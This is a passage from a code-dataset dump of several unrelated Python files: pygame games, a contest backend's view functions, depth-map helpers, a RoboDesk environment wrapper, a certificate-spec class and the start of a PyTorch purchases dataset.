offset\n\n starting_mouse_y += offset\n\n # Scroll the items based on the scroll bar's movement\n scroll_items(items, item_base_y_pos)\n\n # ----------------- Popup Information -----------------\n\n # Item popups with descriptions about the items\n if type(selected_object) == Item and not selected_object.hidden:\n item_popup = ItemPopup((0, 0, 0, 0),\n (selected_object.x - 390, selected_object.y, 390, 100), 0, 0,\n base_path + \"images/building_frame.png\",\n popup_message=ITEM_INFO[selected_object.item_type])\n elif type(selected_object) == Upgrade and not selected_object.hidden:\n upgrade_popup = UpgradePopup((0, 0, 0, 0),\n (selected_object.x + selected_object.width, selected_object.y, 390, 100), 0, 0,\n base_path + \"images/building_frame.png\",\n UPGRADE_COSTS[selected_object.item_type][selected_object.tier],\n popup_message=UPGRADE_INFO[selected_object.item_type][selected_object.tier])\n else:\n item_popup = None\n upgrade_popup = None\n\n # ----------------- Redrawing and Updating -----------------\n\n screen.fill(SCREEN_COLOR)\n\n # Draw stars\n earth_center = earth_clicker.get_center()\n displacement = ((mouse_pos[0] - earth_center[0]) / 2400.0, (mouse_pos[1] - earth_center[1]) / 2400.0)\n\n for star in stars:\n star.update_position(displacement)\n star.draw(screen, False)\n\n draw_main_objects_1(screen, selected_object, basic_objects_layer_1, buttons)\n draw_items(screen, selected_object, items, money)\n draw_upgrades(screen, selected_object, upgrades, money, upgrade_count)\n draw_main_objects_2(screen, basic_objects_layer_2)\n\n earth_clicker.animate()\n sprite_group.draw(screen)\n draw_animated_text(screen, animation_text_list)\n draw_item_popup(screen, item_popup)\n draw_upgrade_popup(screen, upgrade_popup)\n\n if starting:\n transparency = max(transparency - 1 - (255 - transparency) * 0.1, 0)\n new_surface = pygame.Surface((WIDTH, HEIGHT), pygame.SRCALPHA)\n new_surface.set_alpha(transparency)\n new_surface.fill((0, 0, 0))\n screen.blit(new_surface, (0, 0))\n\n if transparency == 0:\n starting = False\n\n # Set the FPS and update\n clock.tick(60)\n pygame.display.update()\n\n # ----------------- PPS (Pollution cleared Per Second) Calculations -----------------\n time += 1\n if not can_click:\n click_interval += 1\n if click_interval >= max_click_interval:\n can_click = True\n click_interval = 0\n if time == 60:\n pps = pollution_cleared - previous_pollution_cleared\n previous_pollution_cleared = pollution_cleared\n time = 0\n\n # ----------------- End of Loop -----------------\n\n # Once the loop has ended, quit the application\n pygame.quit()\n\n\n# If the mouse is touching an object that can be selected, return it.\n# Else, return None for no selected object\ndef get_selected_object(mouse_pos, buttons, items, upgrades):\n for button in buttons:\n if button.is_selecting(mouse_pos):\n return button\n\n for item in items:\n if item.is_selecting(mouse_pos):\n return item\n\n for upgrade in upgrades:\n if not upgrade.hidden and upgrade.is_selecting(mouse_pos):\n return upgrade\n\n return None\n\n\n# Scroll the items/machines based on the base y position\ndef scroll_items(items, item_base_y_pos):\n for item in items:\n item.y = item_base_y_pos + item.item_type * 100\n\n\n# Draw basic objects such as a rectangle\ndef draw_basic_objects(surface, objects):\n for basic_object in objects:\n basic_object.draw(surface, False)\n\n\n# Draw the buttons\ndef draw_buttons(surface, selected_object, buttons):\n for button in buttons:\n if button == selected_object:\n button.draw(surface, True)\n else:\n button.draw(surface, False)\n\n\n# buttons and other main components. This draws the first layer\ndef draw_main_objects_1(screen, selected_object, basic_objects_layer_1, buttons):\n\n surface1 = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n draw_basic_objects(surface1, basic_objects_layer_1)\n\n surface3 = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n draw_buttons(surface3, selected_object, buttons)\n\n surface1.blit(surface3, (0, 0))\n screen.blit(surface1, (0, 0))\n\n\n# buttons and other main components. This draws the second layer\ndef draw_main_objects_2(screen, basic_objects_layer_2):\n surface1 = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n draw_basic_objects(surface1, basic_objects_layer_2)\n screen.blit(surface1, (0, 0))\n\n\n# Draws animated text and moves it every frame\ndef draw_animated_text(screen, animated_texts):\n surface = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n\n indexes = [] # stuff to be removed\n for i in range(len(animated_texts)):\n animated_text = animated_texts[i]\n animated_text.draw(surface, False)\n remove = animated_text.move()\n if remove:\n indexes.append(i)\n\n for removal in indexes:\n animated_texts.pop(removal)\n\n screen.blit(surface, (0, 0))\n\n\n# Draw all the items and calculate their visibility\ndef draw_items(screen, selected_object, items, money):\n surface = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n\n for item in items:\n item.hidden = item.item_type != 0 and item.hidden and money < ITEM_PRICES[item.item_type-1]\n\n item.enough = money >= item.price\n item.draw(surface, selected_object == item)\n\n screen.blit(surface, (0, 0))\n\n\n# Draw all the upgrades and calculate their visibility\ndef draw_upgrades(screen, selected_object, upgrades, money, upgrade_count):\n surface = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n\n for upgrade in upgrades:\n upgrade.hidden = upgrade.purchased or upgrade_count < upgrade.upgrade_order\n upgrade.enough = money >= upgrade.price\n upgrade.draw(surface, selected_object == upgrade)\n\n screen.blit(surface, (0, 0))\n\n\n# Draw the item popup if it exists\ndef draw_item_popup(screen, item_popup):\n if item_popup is None:\n return\n\n surface = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n item_popup.draw(surface, False)\n\n screen.blit(surface, (0, 0))\n\n\n# Draw the Upgrade popup if it exists\ndef draw_upgrade_popup(screen, upgrade_popup):\n if upgrade_popup is None:\n return\n\n surface = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n upgrade_popup.draw(surface, False)\n\n screen.blit(surface, (0, 0))\n\n\n# Run the main function\nif __name__ == '__main__':\n main()\n","repo_name":"Alex2262/carbon_clicker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6541497909","text":"\nfrom datetime import datetime, timedelta\n\nfrom alkindi.errors import ModelError\nfrom alkindi.model.rounds import (\n load_round, load_rounds, find_round_ids_with_badges)\nfrom alkindi.model.round_tasks import load_round_tasks\nfrom alkindi.model.users import load_user, load_users\nfrom alkindi.model.teams import (\n load_team,\n count_teams_in_round,\n count_teams_in_round_region,\n count_teams_in_round_big_region)\nfrom alkindi.model.team_members import load_team_members\nfrom alkindi.model.regions import load_region\nfrom alkindi.model.participations import load_team_participations\nfrom alkindi.model.attempts import (\n load_participation_attempts, get_user_current_attempt_id)\nfrom alkindi.model.access_codes import load_unlocked_access_codes\nfrom alkindi.model.task_instances import load_user_task_instance\nfrom alkindi.model.answers import load_limited_attempt_answers\nfrom alkindi.model.workspace_revisions import (\n load_user_latest_revision_id, load_attempt_revisions)\nfrom alkindi.model.workspaces import load_workspaces\n\n\nAllowHtmlAttrs = {\n '*': ['class'],\n 'a': ['href', 'title'],\n}\n\nAllowHtmlTags = [\n 'div', 'span', 'p', 'ul', 'ol', 'li', 'h1', 'h2', 'h3',\n 'b', 'i', 'strong', 'em'\n]\n\n\ndef view_requesting_user(\n db, user_id=None, participation_id=None, attempt_id=None,\n is_admin=False):\n\n now = datetime.utcnow()\n view = {\n 'now': now,\n 'is_admin': is_admin\n }\n if user_id is None:\n return view\n\n #\n # Add the user.\n #\n user = load_user(db, user_id)\n if user is None:\n return view\n view['user_id'] = user_id\n view['user'] = view_user(user)\n team_id = user['team_id']\n\n #\n # Quick return path when the user has no team.\n #\n if team_id is None:\n # If the user has no team, we look for a round to which a\n # badge grants access.\n badges = user['badges']\n round_ids = find_round_ids_with_badges(db, badges, now)\n if len(round_ids) > 0:\n # TODO: resolve this somehow, for example by returning\n # the round views to the user and letting them choose.\n # For now, pick the first one (which has the greatest id).\n round_id = round_ids[0]\n round_ = load_round(db, round_id, now)\n view['round'] = view_round(round_)\n return view\n\n #\n # Add the team and team members.\n #\n team = load_team(db, team_id)\n members = load_team_members(db, team['id'], users=True)\n team_view = view['team'] = view_team(team, members)\n\n #\n # Add the team's participations.\n #\n participations = load_team_participations(db, team_id)\n round_ids = set()\n for participation in participations:\n round_ids.add(participation['round_id'])\n rounds = load_rounds(db, round_ids, now)\n view['participations'] = [\n view_team_participation(\n participation,\n rounds[participation['round_id']])\n for participation in participations\n ]\n if len(participations) == 0:\n return view\n\n # Mark the lastest (or selected) participation as current.\n if participation_id is None:\n participation = participations[-1]\n else:\n participation = get_by_id(participations, participation_id)\n if participation is None:\n return view\n view['participation_id'] = participation['id']\n for pview in view['participations']:\n if pview['id'] == participation['id']:\n pview['is_current'] = True\n\n #\n # Add the current participation's round.\n #\n round_id = participation['round_id']\n round_ = rounds[round_id]\n view['round'] = view_round(round_)\n\n #\n # Add the tasks for the current round.\n #\n round_tasks = load_round_tasks(db, round_id)\n view['round']['task_ids'] = [str(rt['id']) for rt in round_tasks]\n round_task_views = view['round_tasks'] = {\n str(rt['id']): view_round_task(rt) for rt in round_tasks\n }\n\n region_id = team['region_id']\n\n if round_['status'] == 'closed' and team['region_id'] is not None:\n region = load_region(db, region_id)\n national_count = count_teams_in_round(db, round_id)\n big_region_count = count_teams_in_round_big_region(\n db, round_id, region['big_region_code'])\n region_count = count_teams_in_round_region(db, round_id, region_id)\n view['ranking'] = {\n 'national': {\n 'rank': participation['rank_national'],\n 'count': national_count\n },\n 'big_region': {\n 'name': region['big_region_name'],\n 'rank': participation['rank_big_regional'],\n 'count': big_region_count\n },\n 'region': {\n 'name': region['name'],\n 'rank': participation['rank_regional'],\n 'count': region_count\n }\n }\n\n # XXX A team's validity should be checked against settings for a\n # competition rather than a round.\n causes = validate_members_for_round(members, round_)\n team_view['round_access'] = list(causes.keys())\n team_view['is_invalid'] = len(causes) != 0\n\n # Do not return attempts if the team is invalid.\n if team_view['is_invalid']:\n return view\n\n # Load the participation attempts.\n attempts = load_participation_attempts(db, participation['id'], now)\n view_task_attempts(attempts, round_task_views)\n print(\"attempts {} {}\".format(attempt_id, attempts))\n\n # Find the requested attempt.\n current_attempt = get_by_id(attempts, attempt_id)\n if current_attempt is None:\n return view\n view['attempt_id'] = attempt_id\n\n # Focus on the current attempt.\n current_round_task = round_task_views[str(current_attempt['round_task_id'])]\n current_attempt_view = None\n for attempt_view in current_round_task['attempts']:\n if attempt_id == attempt_view.get('id'):\n current_attempt_view = attempt_view\n view['attempt'] = current_attempt_view\n view['round_task'] = current_round_task # XXX duplicates attempts :(\n\n if False: # Access codes are disabled\n members_view = view['team']['members']\n access_codes = load_unlocked_access_codes(db, attempt_id)\n add_members_access_codes(members_view, access_codes)\n if current_attempt['is_training']:\n needs_codes = not have_one_code(members_view)\n else:\n needs_codes = not have_code_majority(members_view)\n current_attempt_view['needs_codes'] = needs_codes\n\n # Add task instance data, if available.\n try:\n # XXX Previously load_task_instance_team_data which did not parse\n # full_data.\n # /!\\ task contains sensitive data\n # XXX If the round is closed, load and pass full_data?\n task_instance = load_user_task_instance(db, attempt_id)\n except ModelError:\n return view\n\n # If the round has a time limit, return the countdown.\n if round_['duration'] is not None:\n started_at = participation['started_at']\n if started_at is not None:\n duration = timedelta(minutes=round_['duration'])\n countdown = started_at + duration\n view['countdown'] = started_at + duration\n if countdown < now:\n return view\n\n view['team_data'] = task_instance['team_data']\n\n # Add a list of the workspace revisions for this attempt.\n add_revisions(db, view, attempt_id)\n\n # Give the user the id of their latest revision for the\n # current attempt, to be loaded into the crypto tab on\n # first access.\n revision_id = load_user_latest_revision_id(\n db, user_id, attempt_id)\n view['my_latest_revision_id'] = revision_id\n\n return view\n\n\ndef get_by_id(items, id):\n try:\n return next(item for item in items if item['id'] == id)\n except StopIteration:\n return None\n\n\ndef view_user(user):\n \"\"\" Return the user-view for a user.\n \"\"\"\n keys = ['id', 'username', 'firstname', 'lastname']\n return {key: user[key] for key in keys}\n\n\ndef view_team(team, members):\n \"\"\" Return the user-view for a team.\n \"\"\"\n keys = ['id', 'code', 'is_open', 'is_locked']\n result = {key: team[key] for key in keys}\n result['members'] = members\n creators = [m for m in members if m['is_creator']]\n if len(creators) > 0:\n result['creator'] = creators[0]['user']\n return result\n\n\ndef view_region(region):\n keys = ['id', 'name']\n return {key: region[key] for key in keys}\n\n\ndef add_members_access_codes(members, access_codes):\n code_map = {code['user_id']: code for code in access_codes}\n for member in members:\n user_id = member['user_id']\n if user_id in code_map:\n member['access_code'] = code_map[user_id]['code']\n\n\ndef have_one_code(members):\n n_codes = len([m for m in members if 'access_code' in m])\n return n_codes >= 1\n\n\ndef have_code_majority(members):\n n_members = len(members)\n n_codes = len([m for m in members if 'access_code' in m])\n return n_codes * 2 >= n_members\n\n\ndef validate_members_for_round(members, round_):\n \"\"\" Return a dict whose keys indicate reasons why the given\n team members cannot start training for the given round.\n \"\"\"\n result = {}\n n_members = len(members)\n n_qualified = len([m for m in members if m['is_qualified']])\n if n_members < round_['min_team_size']:\n result['team_too_small'] = True\n if n_members > round_['max_team_size']:\n result['team_too_large'] = True\n if n_qualified < n_members * round_['min_team_ratio']:\n result['insufficient_qualified_users'] = True\n return result\n\n\ndef view_round(round_):\n \"\"\" Return the user-view for a round.\n \"\"\"\n keys = [\n 'id', 'title', 'status',\n 'registration_opens_at', 'is_registration_open',\n 'training_opens_at', 'is_training_open',\n 'min_team_size', 'max_team_size', 'min_team_ratio',\n 'allow_team_changes'\n ]\n return {key: round_[key] for key in keys}\n\n\ndef view_team_participation(participation, round_):\n view = {\n 'id': participation['id'],\n 'created_at': participation['created_at'],\n 'round': view_round(round_),\n 'is_qualified': participation['is_qualified'],\n 'score': participation['score']\n }\n if participation['access_code'] is not None:\n if participation['access_code_entered']:\n view['access_code'] = 'provided'\n else:\n view['access_code'] = 'required'\n return view\n\n\ndef view_user_workspace_revision(workspace_revision):\n return workspace_revision\n\n\ndef view_user_task(db, user_id):\n attempt_id = get_user_current_attempt_id(db, user_id)\n return load_task_instance_team_data(db, attempt_id)\n\n\ndef view_revision(revision):\n keys = [\n 'id', 'parent_id', 'creator_id', 'workspace_id',\n 'created_at', 'title', 'is_active', 'is_precious',\n ]\n return {key: revision[key] for key in keys}\n\n\ndef view_workspace(workspace):\n keys = [\n 'id', 'created_at', 'updated_at', 'title'\n # 'attempt_id' omitted\n ]\n return {key: workspace[key] for key in keys}\n\n\ndef add_revisions(db, view, attempt_id):\n # Load revisions.\n revisions = load_attempt_revisions(db, attempt_id)\n # Load related entities.\n user_ids = set()\n workspace_ids = set()\n for revision in revisions:\n user_ids.add(revision['creator_id'])\n workspace_ids.add(revision['workspace_id'])\n users = load_users(db, user_ids)\n workspaces = load_workspaces(db, workspace_ids)\n # Prepare views.\n view['users'] = [view_user(user) for user in users]\n view['workspaces'] = \\\n [view_workspace(workspace) for workspace in workspaces]\n view['revisions'] = revisions\n\n\ndef add_answers(db, view, attempt_id):\n answers = load_limited_attempt_answers(db, attempt_id)\n hide_scores = view['round']['hide_scores']\n view['answers'] = [view_answer(answer, hide_scores) for answer in answers]\n user_ids = set()\n for answer in answers:\n user_ids.add(answer['submitter_id'])\n users = load_users(db, user_ids)\n user_views = [view_user(user) for user in users]\n view['users'] = user_views\n\n\ndef view_round_task(round_task):\n view = {\n 'attempts': []\n }\n fields = [\n 'id', 'task_id', 'title', 'frontend_url',\n 'have_training_attempt', 'max_timed_attempts', 'hide_scores',\n 'attempt_duration', 'max_attempt_answers', 'max_score',\n ]\n for key in fields:\n view[key] = round_task[key]\n return view\n\n\ndef view_task_attempts(attempts, round_task_views):\n # Add each attempt's view to its round_task's view.\n for attempt in attempts:\n round_task_id = str(attempt['round_task_id'])\n round_task_view = round_task_views[round_task_id]\n attempt_view = view_attempt(attempt, round_task_view)\n round_task_view['attempts'].append(attempt_view)\n\n\ndef view_answer(answer, hide_scores):\n view = {}\n cols = [\n 'id', 'submitter_id', 'ordinal', 'created_at', 'answer']\n if not hide_scores:\n cols.append('score')\n cols.append('is_solution')\n cols.append('is_full_solution')\n for col in cols:\n view[col] = answer[col]\n return view\n\n\ndef view_attempt(attempt, round_task_view):\n print('view_attempt {} {}'.format(attempt, round_task_view))\n keys = [\n 'id', 'ordinal', 'created_at', 'started_at', 'closes_at',\n 'is_current', 'is_training', 'is_unsolved', 'is_fully_solved',\n 'is_closed', 'is_completed'\n ]\n view = {key: attempt[key] for key in keys}\n if not attempt['is_training']:\n view['duration'] = round_task_view['attempt_duration']\n if not round_task_view['hide_scores']:\n view['score'] = score = attempt['max_score']\n view['ratio'] = score / round_task_view['max_score'] \\\n if score is not None else None\n return view\n","repo_name":"France-ioi/alkindi-backend","sub_path":"alkindi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73526972991","text":"import numpy as np\nimport cv2\n\ndef make_depth_sparse(depth_map, depth_percentage):\n\n i, j = np.indices(depth_map.shape)\n coordinates = np.hstack((i.reshape((-1,1)), j.reshape((-1,1))))\n total_pixels = coordinates.shape[0]\n\n random_coordinate_ids = np.random.permutation(total_pixels)\n selected_pixels = coordinates[random_coordinate_ids[:int(total_pixels*(100-depth_percentage)/100)]]\n\n sparse_depth = depth_map.copy()\n sparse_depth[selected_pixels[:,0],selected_pixels[:,1]] = 0\n\n return sparse_depth\n\ndef draw_depth(depth_map, max_dist):\n\n norm_depth_map = 255*(1-depth_map/max_dist)\n norm_depth_map[norm_depth_map < 0] =0\n norm_depth_map[depth_map == 0] =0\n\n return cv2.applyColorMap(cv2.convertScaleAbs(norm_depth_map,1), cv2.COLORMAP_MAGMA)\n\ndef update_depth_density(depth_density, depth_density_rate, min_density=0.5, max_density=10):\n\n if depth_density <= min_density or depth_density >= max_density:\n depth_density_rate = -depth_density_rate\n\n depth_density += depth_density_rate\n\n return depth_density, depth_density_rate","repo_name":"PINTO0309/PINTO_model_zoo","sub_path":"160_msg_chn_wacv20/demo/msg_chn_wacv20/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":2990,"dataset":"github-code","pt":"60"} +{"seq_id":"37238777062","text":"from typing import Optional\n\nimport numpy as np\nfrom rlds_creator import environment\nfrom rlds_creator import gym_utils\nfrom rlds_creator import input_utils\nfrom rlds_creator import study_pb2\nfrom robodesk import robodesk\n\n\n# Width and height of the camera. This is not used for the image observations.\n# It should be smaller than the size of the offscreen buffer.\nCAMERA_SIZE = 480\n\nRoboDeskSpec = study_pb2.EnvironmentSpec.RoboDesk\n\n# Mapping from reward enums to the string representations.\n_REWARD = {\n RoboDeskSpec.REWARD_DENSE: 'dense',\n RoboDeskSpec.REWARD_SPARSE: 'sparse',\n RoboDeskSpec.REWARD_SUCCESS: 'success',\n}\n\n# Mapping from actions to the corresponding keys.\n_ACTION_MAPPING = [\n (np.array([-1., 0, 0, 0, 0]), ['a', 'Left']),\n (np.array([+1., 0, 0, 0, 0]), ['d', 'Right', 'Axis0']),\n (np.array([0, +1., 0, 0, 0]), ['w', 'Up']),\n (np.array([0, -1., 0, 0, 0]), ['s', 'Down', 'Axis1']),\n (np.array([0, 0, +1., 0, 0]), ['r', 'Button6']),\n (np.array([0, 0, -1., 0, 0]), ['f', 'Button7']),\n # Rotates the hand.\n (np.array([0, 0, 0, +1., 0]), ['q', 'Button4']),\n (np.array([0, 0, 0, -1., 0]), ['e', 'Button5']),\n # Opens and closes the gripper.\n (np.array([0, 0, 0, 0, +1.]), ['t', 'Button2']),\n (np.array([0, 0, 0, 0, -1.]), ['g', 'Button1']),\n]\n\n# Mapping from keys to the actions.\n_KEY_MAPPING = {key: action for action, keys in _ACTION_MAPPING for key in keys}\n\n# Default camera is (mostly) top-view and is the original setting in RoboDesk.\n_CAMERAS = [\n ('default', {\n 'distance': 1.8,\n 'azimuth': 90,\n 'elevation': -60\n }),\n ('sideview', {\n 'distance': 1.8,\n 'azimuth': 0,\n 'elevation': -60\n }),\n]\n\nfrom dm_control import mujoco\nfrom PIL import Image\n\n\nclass RoboDesk(robodesk.RoboDesk):\n \"\"\"RoboDesk environment with parametric rendering.\"\"\"\n\n def render(self, mode='rgb_array', resize=True, params=None):\n if params is None:\n params = {'size': 120, 'crop_box': (16.75, 25.0, 105.0, 88.75)}\n params.update(_CAMERAS[0][1])\n\n camera = mujoco.Camera(\n physics=self.physics,\n height=params['size'],\n width=params['size'],\n camera_id=-1)\n camera._render_camera.distance = params['distance']\n camera._render_camera.azimuth = params['azimuth']\n camera._render_camera.elevation = params['elevation']\n camera._render_camera.lookat[:] = [0, 0.535, 1.1]\n\n image = camera.render(depth=False, segmentation=False)\n camera._scene.free()\n\n if resize:\n image = Image.fromarray(image).crop(box=params['crop_box'])\n image = image.resize([self.image_size, self.image_size],\n resample=Image.ANTIALIAS)\n image = np.asarray(image)\n return image\n\n\nclass RoboDeskEnvironment(gym_utils.GymEnvironment):\n \"\"\"A RoboDesk environment.\"\"\"\n\n def __init__(self, env_spec: study_pb2.EnvironmentSpec):\n args = env_spec.robodesk\n reward = _REWARD.get(args.reward)\n if not reward:\n raise ValueError('Unsupported reward type.')\n\n gym_env = RoboDesk(\n task=args.task,\n reward=reward,\n action_repeat=args.action_repeat,\n episode_length=env_spec.max_episode_steps,\n image_size=args.image_size)\n # Use the default camera.\n self.set_camera(0)\n\n super().__init__(gym_env)\n\n def keys_to_action(self, keys: environment.Keys) -> np.ndarray:\n keys = input_utils.get_mapped_keys(keys, input_utils.DEFAULT_BUTTON_MAPPING)\n action = np.zeros(5)\n for key, value in keys.items():\n if key in _KEY_MAPPING:\n action += _KEY_MAPPING[key] * value\n return action\n\n def render(self) -> environment.Image:\n # We use a larger image size and camera specific rendering parameters.\n # Cropping, which is enabled by resize, is also disabled.\n params = {'size': CAMERA_SIZE}\n params.update(self._render_params)\n return self._renderer.render(params=params, resize=False)\n\n def set_camera(self, index: int) -> Optional[environment.Camera]:\n if index >= len(_CAMERAS):\n return None\n name, self._render_params = _CAMERAS[index]\n return environment.Camera(index=index, name=name)\n","repo_name":"google-research/rlds-creator","sub_path":"rlds_creator/envs/robodesk_env.py","file_name":"robodesk_env.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"60"} +{"seq_id":"1852628753","text":"import pygame,random\n\n\ndef inicializa():\n pygame.init()\n w = pygame.display.set_mode((1080,600))\n pygame.key.set_repeat(50)\n\n assets = {\n 'player': pygame.image.load('mergulhador.png'),\n 'fundo' : pygame.image.load('fundo2.png'),\n 'tubarao': pygame.image.load('tubarao_mini.png'),\n 'fundo_inicio': pygame.image.load('TELA_INICIAL_JOGO.jpg'),\n 'fundo_final': pygame.image.load('TELA_FINAL_JOGO.jpg')\n }\n\n state = {\n \"merg_x\" : 0,\n \"merg_y\" : 0,\n \"tub_x\" : 600,\n \"tub_y\" : 0,\n \"fundo_inicio2\": assets['fundo_inicio'],\n \"fundo_final2\": assets['fundo_final']\n }\n\n\n state['last_updated'] = 0\n\n\n return w, assets, state\n\n\n\ndef finaliza():\n pygame.quit()\n\n\n\ndef recebe_eventos(state):\n pos = pygame.mouse.get_pos()\n print(pos)\n valor = pygame.time.get_ticks()\n for ev in pygame.event.get():\n if ev.type == pygame.QUIT:\n return False\n if ev.type == pygame.KEYDOWN:\n if ev.key == pygame.K_RIGHT:\n state[\"merg_x\"] += 12\n if ev.key == pygame.K_UP:\n state[\"merg_y\"] -= 12\n if ev.key == pygame.K_LEFT:\n state[\"merg_x\"] -= 12\n if ev.key == pygame.K_DOWN:\n state[\"merg_y\"] += 12\n if state[\"merg_y\"] > 550:\n state[\"merg_y\"] -= 12\n if state['merg_y'] < 0:\n state[\"merg_y\"] += 12\n if state['merg_x'] > 990:\n state['merg_x'] -= 12\n if state['merg_x'] < 0:\n state['merg_x'] += 12\n if ev.type == pygame.MOUSEBUTTONUP: \n if pos[0] >= 336 and pos[0] <= 781 and pos[1] >= 378 and pos[1] <= 431:\n assets['fundo_inicio'] == False\n assets['fundo'] == True\n pygame.display.update()\n state['last_updated'] = valor\n\n\n\n\n return True\n\n\ndef desenha(window, assets, state):\n window.fill((255,255,0))\n window.blit(assets['fundo_inicio'], (0,0))\n window.blit(assets[\"fundo\"], (0,0))\n window.blit(assets[\"player\"], (state[\"merg_x\"],state[\"merg_y\"]))\n window.blit(assets[\"tubarao\"], (state[\"tub_x\"],state[\"tub_y\"]))\n state[\"tub_x\"] -= 10\n if state['tub_x'] == -500:\n state['tub_y'] = random.randint(80,250)\n state['tub_x'] = 920\n state['tub_x'] -= 10\n return False\n pygame.display.update()\n\n\n\ndef gameloop(window, assets, state):\n while recebe_eventos(state):\n desenha(window, assets, state)\n\n\nif __name__ == '__main__':\n window, assets, state = inicializa()\n gameloop(window, assets, state)\n finaliza()","repo_name":"leoscarlato/pygame","sub_path":"jogo/jogo.py","file_name":"jogo.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14806867064","text":"from dataclasses import dataclass\nfrom typing import Optional\n\nfrom ..common import CertLabel, EntityLabel, KeyLabel\nfrom .general import IssuedItemSpec\n\nEXCLUDED_FROM_TEMPLATE = frozenset(\n {'subject', 'subject_key', 'serial', 'certificate_file'}\n)\nEXTNS_EXCLUDED_FROM_TEMPLATE = frozenset({'subject_alt_name'})\n\n\n@dataclass(frozen=True)\nclass CertificateSpec(IssuedItemSpec):\n \"\"\"Certificate specification.\"\"\"\n\n label: CertLabel\n \"\"\"Internal name of the certificate spec.\"\"\"\n\n subject: EntityLabel\n \"\"\"Certificate subject\"\"\"\n\n subject_key: KeyLabel\n \"\"\"Subject's (public) key. Defaults to the value of :attr:`subject`.\"\"\"\n\n templatable_config: dict\n \"\"\"Configuration that can be reused by other certificate specs.\"\"\"\n\n certificate_file: Optional[str] = None\n \"\"\"\n Path to a file with a pre-generated copy of the certificate in question,\n either in DER or in PEM format.\n\n When the certificate determined by this certificate spec is requested,\n the certificate in the file will be returned.\n\n .. warning::\n Certomancer will not attempt to process any information from the\n certificate file, beyond parsing it into an X.509 certificate structure.\n Internally, the certificate spec's entries are used instead.\n It is the config writer's responsibility to make sure that both match\n up.\n\n .. note::\n This option is unavailable when external configuration is disabled.\n Moreover, it is excluded from templates derived from this certificate\n spec.\n \"\"\"\n\n @property\n def self_issued(self) -> bool:\n \"\"\"\n Check whether the corresponding certificate is self-issued,\n i.e. whether the subject and issuer coincide.\n\n .. warning::\n Self-issued and self-signed are two related, but very different\n notions. Not all self-issued certificates are self-signed (e.g.\n CA key rollover can be implemented using self-issued certificates),\n and in principle self-signed certificates need not be self-issued\n either (although that usually makes little sense in practice).\n :return:\n \"\"\"\n return self.subject == self.issuer\n\n @property\n def self_signed(self) -> bool:\n \"\"\"\n Check whether the produced certificate is self-signed,\n i.e. whether the signer's (public) key is the same as the subject key.\n \"\"\"\n return self.subject_key == self.authority_key\n\n @classmethod\n def extract_templatable_config(cls, config_dict):\n # Do this first for consistency, so we don't put processed values\n # into the template\n for k, v in config_dict.items():\n if k.replace('-', '_') in EXCLUDED_FROM_TEMPLATE:\n continue\n elif k == 'extensions':\n yield k, [\n ext_dict\n for ext_dict in v\n if ext_dict['id'] not in EXTNS_EXCLUDED_FROM_TEMPLATE\n ]\n else:\n yield k, v\n","repo_name":"MatthiasValvekens/certomancer","sub_path":"certomancer/registry/issued/cert.py","file_name":"cert.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"60"} +{"seq_id":"44808348460","text":"from csci567.utils.data_utils import *\n\nimport csv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport pickle\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\n\n\n# key = article feature, val = size of embedding\nARTICLE_FEATURES_SIZE = {\n \"article_id\": 4,\n \"product_code\": 8,\n \"product_type_no\": 8,\n \"graphical_appearance_no\": 4,\n \"perceived_colour_master_id\": 4,\n \"index_group_no\": 4,\n \"garment_group_no\": 4,\n}\nARTICLE_FEATURES_LIST = list(ARTICLE_FEATURES_SIZE.keys())\n\n\ndef get_customer_purchases(transactions_df, after=\"2020-08-23\"):\n ''' returns purchases_df: customer_id -> list of purchased article_ids'''\n recent_purchases = transactions_df.loc[transactions_df.t_dat >= pd.to_datetime(after)]\n customers_index_dict = {cust_id: id for id, cust_id in enumerate(\n recent_purchases['customer_id'].unique())}\n articles_index_dict = {art_id: id for id, art_id in enumerate(\n recent_purchases['article_id'].unique())}\n return recent_purchases.groupby(\"customer_id\").article_id.apply(list).reset_index(), \\\n customers_index_dict, \\\n articles_index_dict\n\ndef get_object_features(articles_df):\n features_dicts = {}\n num_features = {}\n total_features = 0\n for object_feature in ARTICLE_FEATURES_LIST:\n unique_features = articles_df[object_feature].unique()\n total_features += len(unique_features)\n num_features[object_feature] = len(unique_features)\n feature_dict = {feature_val: id for id, feature_val in enumerate(\n unique_features)}\n features_dicts[object_feature] = feature_dict\n return features_dicts, num_features, total_features\n\ndef prepare_object_embed_idxs(articles_df, articles_features_dicts):\n article_embed_idxs = {}\n for _, article in articles_df.iterrows():\n article_embed_id = []\n for feature in ARTICLE_FEATURES_LIST:\n article_embed_id.append(articles_features_dicts[feature][article[feature]])\n article_embed_idxs[article[\"article_id\"]] = article_embed_id\n return article_embed_idxs\n\nclass PurchasesDataset(Dataset):\n '''dataset of purchases for contrastive learning'''\n def __init__(self, purchases_df, customers_index_dict, articles_index_dicts, device=None):\n self.device = torch.device(\n 'cuda' if torch.cuda.is_available() else 'cpu') if device is None else device\n self.customer_ids = purchases_df[\"customer_id\"].to_numpy()\n self.purchases_ids = purchases_df[\"article_id\"].to_numpy()\n 